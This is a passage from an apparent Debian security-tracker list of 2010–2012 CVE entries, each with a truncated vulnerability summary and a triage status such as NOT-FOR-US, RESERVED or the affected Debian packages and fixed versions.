FTP server (SR10.exe) 1.1.0.6 in ...) NOT-FOR-US: SR10 FTP server in Ricoh DC Software CVE-2012-5001 (Multiple unspecified vulnerabilities in Hitachi JP1/Cm2/Network Node ...) NOT-FOR-US: Hitachi JP1/Cm2/Network Node Manager CVE-2012-5000 (SQL injection vulnerability in jokes/index.php in the Witze addon 0.9 ...) NOT-FOR-US: deV!L'z Clanportal CVE-2012-4999 (Mercury MR804 Router 8.0 3.8.1 Build 101220 Rel.53006nB allows remote ...) NOT-FOR-US: Mercury MR804 Router CVE-2012-4998 (Cross-site scripting (XSS) vulnerability in index.php in starCMS ...) NOT-FOR-US: starCMS CVE-2012-4997 (Directory traversal vulnerability in acp/index.php in AneCMS allows ...) NOT-FOR-US: AneCMS CVE-2012-4996 (Multiple SQL injection vulnerabilities in RivetTracker 1.03 and ...) NOT-FOR-US: RivetTracker CVE-2012-4995 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: LimeSurvey CVE-2012-4994 (SQL injection vulnerability in admin/admin.php in LimeSurvey before ...) NOT-FOR-US: LimeSurvey CVE-2012-4993 (torrent_functions.php in RivetTracker 1.03 and earlier does not ...) NOT-FOR-US: RivetTracker CVE-2012-4992 (Multiple buffer overflows in FlashFXP.exe in FlashFXP 4.2 allow remote ...) NOT-FOR-US: FlashFXP CVE-2012-4991 (Multiple directory traversal vulnerabilities in Axway SecureTransport ...) NOT-FOR-US: Axway SecureTransport CVE-2012-4990 (SQL injection vulnerability in admin/campaign-zone-link.php in OpenX ...) NOT-FOR-US: OpenX CVE-2012-4989 (Cross-site scripting (XSS) vulnerability in admin/plugin-index.php in ...) NOT-FOR-US: OpenX CVE-2012-4988 RESERVED CVE-2012-4987 (Stack-based buffer overflow in RealNetworks RealPlayer 15.0.5.109 ...) NOT-FOR-US: RealPlayer CVE-2012-4986 RESERVED CVE-2012-4985 (The Forescout CounterACT NAC device 6.3.4.1 does not block ARP and ...) NOT-FOR-US: Forescout device CVE-2012-4984 RESERVED CVE-2012-4983 (Multiple cross-site scripting (XSS) vulnerabilities on the Forescout ...) NOT-FOR-US: Forescout device CVE-2012-4982 (Open redirect vulnerability in assets/login on the Forescout ...) NOT-FOR-US: Forescout device CVE-2012-4981 RESERVED CVE-2012-4980 RESERVED CVE-2012-4979 RESERVED CVE-2012-4978 RESERVED CVE-2012-4977 (Layton Helpbox 4.4.0 allows remote attackers to discover cleartext ...) NOT-FOR-US: Layton Helpbox CVE-2012-4976 (selectawasset.asp in Layton Helpbox 4.4.0 allows remote attackers to ...) NOT-FOR-US: Layton Helpbox CVE-2012-4975 (editrequestuser.asp in Layton Helpbox 4.4.0 allows remote ...) NOT-FOR-US: Layton Helpbox CVE-2012-4974 (Layton Helpbox 4.4.0 allows remote authenticated users to change the ...) NOT-FOR-US: Layton Helpbox CVE-2012-4973 RESERVED CVE-2012-4972 (Multiple cross-site scripting (XSS) vulnerabilities in Layton Helpbox ...) NOT-FOR-US: Layton Helpbox CVE-2012-4971 (Multiple SQL injection vulnerabilities in Layton Helpbox 4.4.0 allow ...) NOT-FOR-US: Layton Helpbox CVE-2012-4970 (Cross-site scripting (XSS) vulnerability in the web management ...) NOT-FOR-US: Polycom HDX Video End Points CVE-2011-5190 (Multiple cross-site scripting (XSS) vulnerabilities in Social Book ...) NOT-FOR-US: Social Book Facebook Clone 2010 CVE-2011-5189 (Cross-site scripting (XSS) vulnerability in the Webform Validation ...) NOT-FOR-US: Drupal addon CVE-2011-5187 (Cross-site scripting (XSS) vulnerability in the Support Ticketing ...) NOT-FOR-US: Drupal addon CVE-2011-5186 (Cross-site scripting (XSS) vulnerability in jbshop.php in the jbShop ...) NOT-FOR-US: jbShop plugin for e107 CVE-2011-5185 (Cross-site scripting (XSS) vulnerability in video_comments.php in ...) NOT-FOR-US: Online Subtitles Workshop CVE-2011-5184 (Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node ...) NOT-FOR-US: HP Network Node Manager CVE-2011-5182 (** DISPUTED ** ...) NOT-FOR-US: Wordpress Lanoba Social plugin, not in Debian CVE-2011-5181 (Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk ...) NOT-FOR-US: Wordpress ClickDesk Live Support - Live Chat plugin, not in Debian CVE-2011-5180 (Cross-site scripting (XSS) vulnerability in wp-1pluginjquery.php in ...) NOT-FOR-US: Wordpress ZooEffect plugin, not in Debian CVE-2011-5179 (Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php ...) NOT-FOR-US: Skysa App Bar CVE-2011-5177 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: eSyndiCat Pro CVE-2012-4969 (Use-after-free vulnerability in the CMshtmlEd::Exec function in ...) NOT-FOR-US: Internet Explorer CVE-2012-4968 (Multiple cross-site scripting (XSS) vulnerabilities in SilverStripe ...) - silverstripe (bug #528461) CVE-2012-4967 RESERVED CVE-2012-4966 RESERVED CVE-2012-4965 RESERVED CVE-2012-4964 (The Samsung printer firmware before 20121031 has a hardcoded ...) NOT-FOR-US: Samsung printer firmware CVE-2012-4963 RESERVED CVE-2012-4962 RESERVED CVE-2012-4961 RESERVED CVE-2012-4960 RESERVED CVE-2012-4959 (Directory traversal vulnerability in NFRAgent.exe in Novell File ...) NOT-FOR-US: Novell File Reporter CVE-2012-4958 (Directory traversal vulnerability in NFRAgent.exe in Novell File ...) NOT-FOR-US: Novell File Reporter CVE-2012-4957 (Absolute path traversal vulnerability in NFRAgent.exe in Novell File ...) NOT-FOR-US: Novell File Reporter CVE-2012-4956 (Heap-based buffer overflow in NFRAgent.exe in Novell File Reporter ...) NOT-FOR-US: Novell File Reporter CVE-2012-4955 (Cross-site scripting (XSS) vulnerability in Dell OpenManage Server ...) NOT-FOR-US: Dell OpenManage SA CVE-2012-4954 (The edit-profile page in Vanilla Forums before 2.1a32 allows remote ...) NOT-FOR-US: Vanilla Forums CVE-2012-4953 (The decomposer engine in Symantec Endpoint Protection (SEP) 11.0, ...) NOT-FOR-US: Symantec Endpoint Protection CVE-2012-4952 (Henry Schein Dentrix G5 before 15.1.294 has a single internal-database ...) NOT-FOR-US: Dentrix CVE-2012-4951 (Multiple SQL injection vulnerabilities in terminal/paramedit.aspx in ...) NOT-FOR-US: VeriFone VeriCentre Web Console CVE-2012-4950 (Cross-site scripting (XSS) vulnerability in the Keyword Search page in ...) NOT-FOR-US: Pattern Insight CVE-2012-4949 (SQL injection vulnerability in ESRI ArcGIS 10.1 allows remote ...) NOT-FOR-US: ESRI ArcGIS CVE-2012-4948 (The default configuration of Fortinet Fortigate UTM appliances uses ...) NOT-FOR-US: Fortinet Fortigate UTM applianced CVE-2012-4947 (Agile FleetCommander and FleetCommander Kiosk before 4.08 store ...) NOT-FOR-US: FleetCommander CVE-2012-4946 (Agile FleetCommander and FleetCommander Kiosk before 4.08 use an XOR ...) NOT-FOR-US: FleetCommander CVE-2012-4945 (Agile FleetCommander and FleetCommander Kiosk before 4.08 allow remote ...) NOT-FOR-US: FleetCommander CVE-2012-4944 (Multiple unrestricted file upload vulnerabilities in Agile ...) NOT-FOR-US: FleetCommander CVE-2012-4943 (Multiple cross-site request forgery (CSRF) vulnerabilities in Agile ...) NOT-FOR-US: FleetCommander CVE-2012-4942 (Multiple cross-site scripting (XSS) vulnerabilities in Agile ...) NOT-FOR-US: FleetCommander CVE-2012-4941 (Multiple SQL injection vulnerabilities in Agile FleetCommander and ...) NOT-FOR-US: FleetCommander CVE-2012-4940 (Multiple directory traversal vulnerabilities in the View Log Files ...) NOT-FOR-US: Axigen Free Mail Server CVE-2012-4939 (Cross-site scripting (XSS) vulnerability in IPAMSummaryView.aspx in ...) NOT-FOR-US: SolarWinds Orion Network Performance Monitor CVE-2012-4938 (Cross-site scripting (XSS) vulnerability in the web interface in ...) NOT-FOR-US: Pattern Insight CVE-2012-4937 (Session fixation vulnerability in the web interface in Pattern Insight ...) NOT-FOR-US: Pattern Insight CVE-2012-4936 (The web interface in Pattern Insight 2.3 allows remote attackers to ...) NOT-FOR-US: Pattern Insight CVE-2012-4935 (Cross-site request forgery (CSRF) vulnerability in the web interface ...) NOT-FOR-US: Pattern Insight CVE-2012-4934 (TomatoCart 1.1.7, when the PayPal Express Checkout module is enabled ...) NOT-FOR-US: TomatoCart CVE-2012-4933 (The rtrlet web application in the Web Console in Novell ZENworks Asset ...) NOT-FOR-US: Novell ZENworks CVE-2012-4932 (Multiple cross-site scripting (XSS) vulnerabilities in SimpleInvoices ...) NOT-FOR-US: SimpleInvoices CVE-2012-4931 RESERVED CVE-2012-4930 (The SPDY protocol 3 and earlier, as used in Mozilla Firefox, Google ...) - iceweasel (Firefox ESV not support SDPY) - chromium-browser 21.0.1180.57~r148591-1 NOTE: http://www.imperialviolet.org/2012/09/21/crime.html CVE-2012-4929 (The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google ...) {DSA-2627-1 DSA-2626-1 DSA-2579-1} - iceweasel (Firefox ESV not use TLS/SSL compression) - chromium-browser 22.0.1229.94~r161065-1 - qt4-x11 4:4.8.2+dfsg-3 - apache2 2.2.22-12 (bug #689936) - lighttpd 1.4.30-1 (bug #700399) - nginx 1.2.1-2.2 (bug #700426) [squeeze] - qt4-x11 (Minor issue) NOTE: Chromium fix: https://chromiumcodereview.appspot.com/10825183/ CVE-2012-4928 (Cross-site scripting (XSS) vulnerability in ow_updates/index.php in ...) NOT-FOR-US: Oxwall 1.1.1 CVE-2012-4927 (SQL injection vulnerability in Limesurvey (a.k.a PHPSurveyor) before ...) NOT-FOR-US: Limesurvey CVE-2012-4926 (approve.php in Img Pals Photo Host 1.0 does not authenticate requests, ...) NOT-FOR-US: Img Pals Photo Host 1.0 CVE-2012-4925 (Multiple SQL injection vulnerabilities in approve.php in Img Pals ...) NOT-FOR-US: Img Pals Photo Host 1.0 CVE-2012-4924 (Buffer overflow in the CxDbgPrint function in the ipswcom.dll ActiveX ...) NOT-FOR-US: ASUS Net4Switch CVE-2012-4923 (Multiple cross-site scripting (XSS) vulnerabilities in Endian Firewall ...) NOT-FOR-US: Endian Firewall 2.4 CVE-2012-4922 (The tor_timegm function in common/util.c in Tor before 0.2.2.39, and ...) {DSA-2548-1} - tor 0.2.3.22-rc-1 CVE-2012-4921 RESERVED CVE-2012-4920 RESERVED CVE-2012-4919 RESERVED CVE-2012-4918 (Call of Duty Elite for iOS 2.0.1 does not properly validate the server ...) NOT-FOR-US: Call of Duty Elite for iOS CVE-2012-4917 (The TripAdvisor app 6.6 for iOS sends cleartext credentials, which ...) NOT-FOR-US: The TripAdvisor app 6.6 for iOS CVE-2012-4916 RESERVED CVE-2012-4915 RESERVED CVE-2012-4914 (Stack-based buffer overflow in the reader in CoolPDF 3.0.2.256 allows ...) NOT-FOR-US: CoolPDF CVE-2012-4913 RESERVED CVE-2012-4912 (Cross-site scripting (XSS) vulnerability in the WebAccess component in ...) NOT-FOR-US: Novell GroupWise CVE-2011-5188 (Cross-site scripting (XSS) vulnerability in the Support Timer module ...) NOT-FOR-US: Drupal module CVE-2011-5183 (Multiple SQL injection vulnerabilities in OrderSys 1.6.4 and earlier ...) NOT-FOR-US: OrderSys CVE-2011-5178 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Infoblox NetMRI CVE-2011-5176 (Multiple cross-site scripting (XSS) vulnerabilities in search.php in ...) NOT-FOR-US: Banana Dance CVE-2011-5175 (SQL injection vulnerability in search.php in Banana Dance, possibly ...) NOT-FOR-US: Banana Dance CVE-2011-5174 (Buffer overflow in Intel Trusted Execution Technology (TXT) SINIT ...) NOT-FOR-US: Intel Trusted Execution Technology CVE-2011-5173 (Buffer overflow in Bugbear Entertainment FlatOut 2005 allows ...) NOT-FOR-US: Bugbear Entertainment FlatOut 2005 CVE-2011-5172 (Stack-based buffer overflow in StoryBoard Quick 6 Build 3786, and ...) NOT-FOR-US: StoryBoard Quick 6 Build, StoryBoard Artist and StoryBoard Studio CVE-2011-5171 (Multiple stack-based buffer overflows in CyberLink Power2Go 7 (build ...) NOT-FOR-US: CyberLink Power2Go CVE-2011-5170 (Stack-based buffer overflow in Castillo Bueno Systems CCMPlayer 1.5 ...) NOT-FOR-US: Castillo Bueno Systems CCMPlayer CVE-2011-5169 (SQL injection vulnerability in ...) NOT-FOR-US: SonicWall ViewPoint CVE-2011-5168 (SQL injection vulnerability in user.php in Banana Dance before B.1.5 ...) NOT-FOR-US: Banana Dance CVE-2011-5167 (Heap-based buffer overflow in the SetDevNames method of the Tidestone ...) NOT-FOR-US: Oracle Hyperion Strategic Finance CVE-2011-5166 (Multiple stack-based buffer overflows in KnFTP 1.0.0 allow remote ...) NOT-FOR-US: KnFTP CVE-2011-5165 (Stack-based buffer overflow in Free MP3 CD Ripper 1.1, 2.6 and ...) NOT-FOR-US: Free MP3 CD Ripper CVE-2011-5164 (Stack-based buffer overflow in VanDyke Software AbsoluteFTP 1.9.6 ...) NOT-FOR-US: VanDyke Software AbsoluteFTP CVE-2011-5163 (Buffer overflow in an unspecified third-party component in the Batch ...) NOT-FOR-US: Schneider Electric CitectSCADA CVE-2011-5162 (Stack-based buffer overflow in GOM Player 2.1.33.5071 allows ...) NOT-FOR-US: GOM Player CVE-2012-4911 RESERVED CVE-2012-4910 RESERVED CVE-2012-4909 (Google Chrome before 18.0.1025308 on Android allows remote attackers ...) - chromium-browser (Chrome on Android) CVE-2012-4908 (Google Chrome before 18.0.1025308 on Android allows remote attackers ...) - chromium-browser (Chrome on Android) CVE-2012-4907 (Google Chrome before 18.0.1025308 on Android does not properly ...) - chromium-browser (Chrome on Android) CVE-2012-4906 (Google Chrome before 18.0.1025308 on Android does not properly ...) - chromium-browser (Chrome on Android) CVE-2012-4905 (Cross-site scripting (XSS) vulnerability in Google Chrome before ...) - chromium-browser (Chrome on Android) CVE-2012-4904 (Cross-application scripting vulnerability in Google Chrome before ...) - chromium-browser (Chrome on Android) CVE-2012-4903 (Google Chrome before 18.0.1025308 on Android does not properly ...) - chromium-browser (Chrome on Android) CVE-2012-4902 RESERVED CVE-2012-4901 RESERVED CVE-2012-4900 RESERVED CVE-2012-4899 (WellinTech KingView 6.5.3 and earlier uses a weak password-hashing ...) NOT-FOR-US: WellinTech KingView CVE-2012-4898 (Mesh OS before 7.9.1.1 on Tropos wireless mesh routers does not use a ...) NOT-FOR-US: Mesh OS CVE-2012-4897 (Untrusted search path vulnerability in the installer in VMware Movie ...) NOT-FOR-US: VMware CVE-2012-4896 (Heap-based buffer overflow in SumatraPDF before 2.1 allows remote ...) NOT-FOR-US: SumatraPDF CVE-2012-4895 (Heap-based buffer overflow in SumatraPDF before 2.1 allows remote ...) NOT-FOR-US: SumatraPDF CVE-2012-4894 (Google SketchUp before 8.0.14346 (aka 8 Maintenance 3) allows ...) NOT-FOR-US: Google SketchUp CVE-2012-4893 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: Webmin CVE-2012-4892 (Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS ...) NOT-FOR-US: FlatnuX CMS CVE-2012-4891 (Cross-site scripting (XSS) vulnerability in fw/index2.do in ...) NOT-FOR-US: ManageEngine Firewall Analyzer CVE-2012-4890 (Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS ...) NOT-FOR-US: FlatnuX CMS CVE-2012-4889 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...) NOT-FOR-US: ManageEngine Firewall Analyzer CVE-2012-4888 RESERVED CVE-2012-4887 RESERVED CVE-2012-4886 RESERVED CVE-2012-4885 (The wikitext parser in MediaWiki 1.17.x before 1.17.3 and 1.18.x ...) - mediawiki 1:1.19.0-1 (low) CVE-2012-4884 (Argument injection vulnerability in Request Tracker (RT) 3.8.x before ...) {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2011-5161 (Unrestricted file upload vulnerability in the patient photograph ...) NOT-FOR-US: OpenEMR CVE-2011-5160 (Cross-site scripting (XSS) vulnerability in setup.php in OpenEMR 4 ...) NOT-FOR-US: OpenEMR CVE-2011-5159 (Cross-site scripting (XSS) vulnerability in admin/configuration.php in ...) NOT-FOR-US: Geeklog CVE-2012-4883 (Multiple untrusted search path vulnerabilities in 3DVIA Composer ...) NOT-FOR-US: 3DVIA Composer V6R2012 CVE-2012-4882 (Multiple untrusted search path vulnerabilities in 3D XML Player ...) NOT-FOR-US: 3D XML Player CVE-2012-4881 (Untrusted search path vulnerability in moviEZ HD 1.0 Build ...) NOT-FOR-US: moviEZ CVE-2012-4880 (Multiple untrusted search path vulnerabilities in DVD Architect Pro ...) NOT-FOR-US: DVD Architect Pro CVE-2012-4879 (The Linux Console on the WAGO I/O System 758 model 758-870, 758-874, ...) NOT-FOR-US: WAGO I/O System 758 CVE-2012-4878 (Absolute path traversal vulnerability in controlcenter.php in FlatnuX ...) NOT-FOR-US: FlatnuX CMS CVE-2012-4877 (Cross-site request forgery (CSRF) vulnerability in controlcenter.php ...) NOT-FOR-US: FlatnuX CMS CVE-2012-4876 (Stack-based buffer overflow in the UltraMJCam ActiveX Control in ...) NOT-FOR-US: TRENDnet SecurView TV-IP121WN Wireless Internet Camera CVE-2012-4875 (** DISPUTED ** ...) - ghostscript (Even if it's genuine, it's Windows-code) CVE-2012-4874 (Unspecified vulnerability in the Another WordPress Classifieds Plugin ...) NOT-FOR-US: Another WordPress Classifieds Plugin for Wordpress CVE-2012-4873 (Cross-site scripting (XSS) vulnerability in the file_download function ...) NOT-FOR-US: GNUBoard CVE-2012-4872 (Cross-site scripting (XSS) vulnerability in Tickets/Submit in Kayako ...) NOT-FOR-US: Kayako Fusion CVE-2012-4871 (Cross-site scripting (XSS) vulnerability in service/graph_html.php in ...) NOT-FOR-US: LiteSpeed Web Server CVE-2012-4870 (Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.9 and ...) - freepbx (bug #464926) CVE-2012-4869 (The callme_startcall function in recordings/misc/callme_page.php in ...) - freepbx (bug #464926) CVE-2012-4868 (SQL injection vulnerability in news.php in the Kunena component 1.7.2 ...) NOT-FOR-US: Kunena component for Joomla! CVE-2012-4867 (Directory traversal vulnerability in ...) NOT-FOR-US: vtiger CRM CVE-2012-4866 (Untrusted search path vulnerability in Xtreme RAT 3.5 allows local ...) NOT-FOR-US: Xtreme RAT CVE-2012-4865 (Buffer overflow in Oreans Themida 2.1.8.0 allows remote attackers to ...) NOT-FOR-US: Oreans Themida CVE-2012-4864 (Oreans WinLicense 2.1.8.0 allows remote attackers to cause a denial of ...) NOT-FOR-US: Oreans WinLicense CVE-2012-4863 RESERVED CVE-2012-4862 (The Host Connect emulator in IBM Rational Developer for System z 7.1 ...) NOT-FOR-US: IBM Rational CVE-2012-4861 (The web server in InfoSphere Data Replication Dashboard in IBM ...) NOT-FOR-US: IBM InfoSphere CVE-2012-4860 RESERVED CVE-2012-4859 (Unspecified vulnerability in IBM Tivoli Storage Manager for Space ...) NOT-FOR-US: IBM Tivoli Storage Manager CVE-2012-4858 (IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4857 (Buffer overflow in IBM Informix 11.50 through 11.50.xC9W2 and 11.70 ...) NOT-FOR-US: IBM Informix CVE-2012-4856 (The Service Processor in the IBM Power 5 91##-### and 940#-### before ...) NOT-FOR-US: IBM Power 5 CVE-2012-4855 (Unspecified vulnerability in the web services framework in IBM ...) NOT-FOR-US: IBM WebSphere Commerce CVE-2012-4854 RESERVED CVE-2012-4853 (Cross-site request forgery (CSRF) vulnerability in IBM WebSphere ...) NOT-FOR-US: Websphere CVE-2012-4852 RESERVED CVE-2012-4851 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Application ...) NOT-FOR-US: Websphere CVE-2012-4850 (IBM WebSphere Application Server 8.5 Liberty Profile before 8.5.0.1, ...) NOT-FOR-US: Websphere CVE-2012-4849 RESERVED CVE-2012-4848 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus ...) NOT-FOR-US: IBM Lotus Foundations Start CVE-2012-4847 (IBM Cognos Business Intelligence (BI) 8.4 and 8.4.1 allows remote ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4846 (IBM Lotus Notes 8.5.x before 8.5.3 FP3 does not include the HTTPOnly ...) NOT-FOR-US: IBM Lotus Notes CVE-2012-4845 (The FTP client in AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does ...) NOT-FOR-US: AIX CVE-2012-4844 (Cross-site scripting (XSS) vulnerability in the web server in IBM ...) NOT-FOR-US: IBM Lotus Domino CVE-2012-4843 RESERVED CVE-2012-4842 (Open redirect vulnerability in the web server in IBM Lotus Domino ...) NOT-FOR-US: IBM Lotus Domino CVE-2012-4841 (Unspecified vulnerability in Tivoli Endpoint Manager for Remote ...) NOT-FOR-US: Tivoli CVE-2012-4840 (IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4839 (The OSLC interface in the Web Client (aka CQ Web) in IBM Rational ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-4838 (IBM Flex System Chassis Management Module (CMM) and Integrated ...) NOT-FOR-US: IBM Flex CVE-2012-4837 (IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4836 (Cross-site scripting (XSS) vulnerability in IBM Cognos Business ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4835 (Cross-site scripting (XSS) vulnerability in IBM Cognos Business ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4834 (Directory traversal vulnerability in LayerLoader.jsp in the theme ...) NOT-FOR-US: IBM WebSphere Portal CVE-2012-4833 (fuser in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not ...) NOT-FOR-US: AIX CVE-2012-4832 (Information Services Framework (ISF) in IBM InfoSphere Information ...) NOT-FOR-US: IBM InfoSphere CVE-2012-4831 RESERVED CVE-2012-4830 (Unspecified vulnerability in IBM WebSphere Commerce 6.0 through ...) NOT-FOR-US: WebSphere CVE-2012-4829 (IBM XIV Storage System Gen3 before 11.2 relies on a default X.509 v3 ...) NOT-FOR-US: IBM CVE-2012-4828 RESERVED CVE-2012-4827 RESERVED CVE-2012-4826 (Stack-based buffer overflow in the SQL/PSM (aka SQL Persistent Stored ...) NOT-FOR-US: IBM DB2 CVE-2012-4825 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Lotus Notes CVE-2012-4824 (Open redirect vulnerability in servlet/traveler in IBM Lotus Notes ...) NOT-FOR-US: Lotus Notes CVE-2012-4823 (Unspecified vulnerability in the JRE component in IBM Java 7 SR2 and ...) - openjdk-6 (Vulnerabilities specific to IBM Java) - openjdk-7 (Vulnerabilities specific to IBM Java) CVE-2012-4822 (Multiple unspecified vulnerabilities in the JRE component in IBM Java ...) - openjdk-6 (Vulnerabilities specific to IBM Java) - openjdk-7 (Vulnerabilities specific to IBM Java) CVE-2012-4821 (Multiple unspecified vulnerabilities in the JRE component in IBM Java ...) - openjdk-6 (Vulnerabilities specific to IBM Java) - openjdk-7 (Vulnerabilities specific to IBM Java) CVE-2012-4820 (Unspecified vulnerability in the JRE component in IBM Java 7 SR2 and ...) - openjdk-6 (Vulnerabilities specific to IBM Java) - openjdk-7 (Vulnerabilities specific to IBM Java) CVE-2012-4819 (Cross-site scripting (XSS) vulnerability in InfoSphere Business ...) NOT-FOR-US: IBM InfoSphere CVE-2012-4818 RESERVED CVE-2012-4817 (The NFSv4 client implementation in IBM AIX 5.3, 6.1, and 7.1, and VIOS ...) NOT-FOR-US: IBM AIX, VIOS CVE-2012-4816 (IBM Rational Automation Framework (RAF) 3.x through 3.0.0.5 allows ...) NOT-FOR-US: IBM Rational Automation Framework CVE-2012-4815 RESERVED CVE-2012-4814 RESERVED CVE-2012-4813 RESERVED CVE-2012-4812 RESERVED CVE-2012-4811 RESERVED CVE-2012-4810 RESERVED CVE-2012-4809 RESERVED CVE-2012-4808 RESERVED CVE-2012-4807 RESERVED CVE-2012-4806 RESERVED CVE-2012-4805 RESERVED CVE-2012-4804 RESERVED CVE-2012-4803 RESERVED CVE-2012-4802 RESERVED CVE-2012-4801 RESERVED CVE-2012-4800 RESERVED CVE-2012-4799 RESERVED CVE-2012-4798 RESERVED CVE-2012-4797 RESERVED CVE-2012-4796 RESERVED CVE-2012-4795 RESERVED CVE-2012-4794 RESERVED CVE-2012-4793 RESERVED CVE-2012-4792 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-4791 (Microsoft Exchange Server 2007 SP3 and 2010 SP1 and SP2 allows remote ...) NOT-FOR-US: Microsoft Exchange Server CVE-2012-4790 RESERVED CVE-2012-4789 RESERVED CVE-2012-4788 RESERVED CVE-2012-4787 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-4786 (The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows ...) NOT-FOR-US: Microsoft Windows CVE-2012-4785 RESERVED CVE-2012-4784 RESERVED CVE-2012-4783 RESERVED CVE-2012-4782 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-4781 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-4780 RESERVED CVE-2012-4779 RESERVED CVE-2012-4778 RESERVED CVE-2012-4777 (The code-optimization feature in the reflection implementation in ...) NOT-FOR-US: Microsoft .NET Framework CVE-2012-4776 (The Web Proxy Auto-Discovery (WPAD) functionality in Microsoft .NET ...) NOT-FOR-US: Microsoft .NET Framework CVE-2012-4775 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Internet Explorer CVE-2012-4774 (Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows ...) NOT-FOR-US: Microsoft Windows CVE-2012-4773 (Multiple cross-site request forgery (CSRF) vulnerabilities in Subrion ...) NOT-FOR-US: Subrion CMS CVE-2012-4772 (SQL injection vulnerability in register/ in Subrion CMS before 2.2.3 ...) NOT-FOR-US: Subrion CMS CVE-2012-4771 (Multiple cross-site scripting (XSS) vulnerabilities in Subrion CMS ...) NOT-FOR-US: Subrion CMS CVE-2012-4770 RESERVED CVE-2012-4769 RESERVED CVE-2012-4768 RESERVED CVE-2012-4767 RESERVED CVE-2012-4766 RESERVED CVE-2012-4765 RESERVED CVE-2012-4764 RESERVED CVE-2012-4763 RESERVED CVE-2012-4762 RESERVED CVE-2012-4761 RESERVED CVE-2012-4760 RESERVED CVE-2011-5158 (Multiple untrusted search path vulnerabilities in the DMTGUI2.EXE and ...) NOT-FOR-US: DATEV Grundpaket Basis CVE-2010-5274 (Untrusted search path vulnerability in PKZIP before 12.50.0014 allows ...) NOT-FOR-US: PKZIP CVE-2010-5273 (Untrusted search path vulnerability in Altova DiffDog 2011 Enterprise ...) NOT-FOR-US: Altova DiffDog 2011 Enterprise CVE-2010-5272 (Untrusted search path vulnerability in Altova DatabaseSpy 2011 ...) NOT-FOR-US: Altova DatabaseSpy 2011 CVE-2010-5271 (Untrusted search path vulnerability in Altova MapForce 2011 Enterprise ...) NOT-FOR-US: Altova MapForce 2011 CVE-2010-5270 (Multiple untrusted search path vulnerabilities in Adobe Device Central ...) NOT-FOR-US: Adobe Device Central CVE-2010-5269 (Untrusted search path vulnerability in tbb.dll in Intel Threading ...) NOT-FOR-US: Intel Threading Building Blocks CVE-2010-5268 (Untrusted search path vulnerability in Amazon Kindle for PC 1.3.0 ...) NOT-FOR-US: Amazon Kindle for PC CVE-2010-5267 (Untrusted search path vulnerability in MunSoft Easy Office Recovery ...) NOT-FOR-US: MunSoft Easy Office Recovery CVE-2010-5266 (Untrusted search path vulnerability in VideoCharge Studio 2.9.0.632 ...) NOT-FOR-US: VideoCharge Studio CVE-2010-5265 (Untrusted search path vulnerability in SmartSniff 1.71 allows local ...) NOT-FOR-US: SmartSniff CVE-2010-5264 (Untrusted search path vulnerability in the CExtDWM::CExtDWM method in ...) NOT-FOR-US: Prof-UIS CVE-2010-5263 (Untrusted search path vulnerability in Sothink SWF Decompiler 6.0 ...) NOT-FOR-US: Sothink SWF Decompiler CVE-2010-5262 (Multiple untrusted search path vulnerabilities in libmcl-5.4.0.dll in ...) NOT-FOR-US: Gromada Multimedia Conversion Library CVE-2010-5261 (Untrusted search path vulnerability in SnowFox Total Video Converter ...) NOT-FOR-US: SnowFox Total Video Converter CVE-2010-5260 (Untrusted search path vulnerability in Agrin All DVD Ripper 4.0 allows ...) NOT-FOR-US: Agrin All DVD Ripper CVE-2010-5259 (Multiple untrusted search path vulnerabilities in IsoBuster 2.8 allow ...) NOT-FOR-US: IsoBuster CVE-2010-5258 (Untrusted search path vulnerability in Adobe Audition 3.0 build 7283.0 ...) NOT-FOR-US: Adobe Audition CVE-2010-5257 (Multiple untrusted search path vulnerabilities in ArchiCAD 13 and 14 ...) NOT-FOR-US: ArchiCAD CVE-2010-5256 (Untrusted search path vulnerability in CDisplay 1.8.1 allows local ...) NOT-FOR-US: CDisplay CVE-2010-5255 (Untrusted search path vulnerability in UltraISO 9.3.6.2750 allows ...) NOT-FOR-US: UltraISO CVE-2010-5254 (Untrusted search path vulnerability in GFI Backup 3.1 Build 20100730 ...) NOT-FOR-US: GFI Backup CVE-2010-5253 (Untrusted search path vulnerability in WinImage 8.50 allows local ...) NOT-FOR-US: WinImage CVE-2010-5252 (Untrusted search path vulnerability in 